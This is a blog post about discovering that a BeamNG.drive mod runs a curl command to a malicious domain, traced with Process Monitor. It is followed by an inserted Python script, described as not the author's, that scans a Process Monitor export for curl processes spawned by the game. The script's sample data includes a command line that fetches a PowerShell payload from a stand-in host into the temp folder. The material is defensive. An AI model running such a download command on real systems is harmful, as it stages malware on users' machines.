I Found Malware in a BeamNG Mod
Published on: 2025-07-31 11:17:28
WARNING: This post contains snippets of code from real malware. Do not run any of the code in this post outside of a secure, isolated virtual machine.
Last week, I fired up BeamNG.drive hoping to enjoy a ride around Belasco City. But, just after I launched the game, I noticed an odd notification from my antivirus software.
curl.exe? That can’t be good. Cloudflare Radar confirmed the domain that curl tried to access is known to be malicious. At this point, however, I wasn’t 100% sure this came from the game.
Starting the investigation
To find out if the problem was indeed in the game, I re-launched it with Process Monitor running. Filtering through the events, my suspicion was confirmed: a process launching cmd with a curl command was spawned by the game.
But where exactly was this command coming from? Was it a mod, or was the game itself compromised?
Inspecting the call stack in Process Monitor shows the command was executed by calling WinExec, a legacy function from 16-bit Windows
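The Process Monitor step above can be turned into a repeatable check. The script below is an added example, not the author's code or capture: it parses a constructed Procmon CSV export, rebuilds each process's parent chain from "Process Create" events, and flags any descendant of the game whose command line invokes curl. The game's image name (BeamNG.drive.x64.exe), the sample rows and the placeholder domain are assumptions.

```python
import csv, io, re

# Constructed Process Monitor CSV export (sample data, not the author's capture).
# Procmon puts the child PID and command line of a "Process Create" event in Detail;
# Path holds the child's image, Process Name/PID identify the parent.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"12:01:03.1","BeamNG.drive.x64.exe","4120","Process Create","C:\Windows\System32\cmd.exe","SUCCESS","PID: 5280, Command line: cmd.exe /c curl.exe -s https://malicious.example/payload.ps1 -o %TEMP%\stage.ps1"
"12:01:03.2","cmd.exe","5280","Process Create","C:\Windows\System32\curl.exe","SUCCESS","PID: 5300, Command line: curl.exe -s https://malicious.example/payload.ps1 -o C:\Users\me\AppData\Local\Temp\stage.ps1"
"12:01:05.0","explorer.exe","1200","Process Create","C:\Program Files\Notepad++\notepad++.exe","SUCCESS","PID: 5400, Command line: notepad++.exe"
'''

DETAIL_RE = re.compile(r"PID:\s*(\d+),\s*Command line:\s*(.*)$")
URL_RE = re.compile(r"https?://[^\s\"']+")

def parse_process_creates(csv_text):
    """Map child PID -> {parent, parent_pid, child, cmdline} from Process Create rows."""
    creates = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        m = DETAIL_RE.search(row["Detail"])
        if row["Operation"] != "Process Create" or not m:
            continue
        creates[int(m.group(1))] = {
            "parent": row["Process Name"],
            "parent_pid": int(row["PID"]),
            "child": row["Path"].rsplit("\\", 1)[-1],  # image basename
            "cmdline": m.group(2),
        }
    return creates

def process_chain(creates, pid):
    """Root-first image names from the earliest ancestor seen in the capture down to pid."""
    chain = []
    while pid in creates:
        ev = creates[pid]
        chain.append(ev["child"])
        if ev["parent_pid"] not in creates:  # parent was already running when capture began
            chain.append(ev["parent"])
        pid = ev["parent_pid"]
    return chain[::-1]

def find_downloader_chains(csv_text, game_image="BeamNG.drive.x64.exe"):
    """Flag processes descended from the game whose command line invokes curl, with any URLs."""
    creates = parse_process_creates(csv_text)
    hits = []
    for pid, ev in creates.items():
        chain = process_chain(creates, pid)
        if game_image in chain and "curl" in ev["cmdline"].lower():
            hits.append({"pid": pid, "chain": chain, "urls": URL_RE.findall(ev["cmdline"])})
    return hits
```

Run it against a real export (File > Save as CSV in Procmon) by passing the file contents to find_downloader_chains; each hit gives the full game -> cmd.exe -> curl.exe chain and the URLs to check against a reputation service.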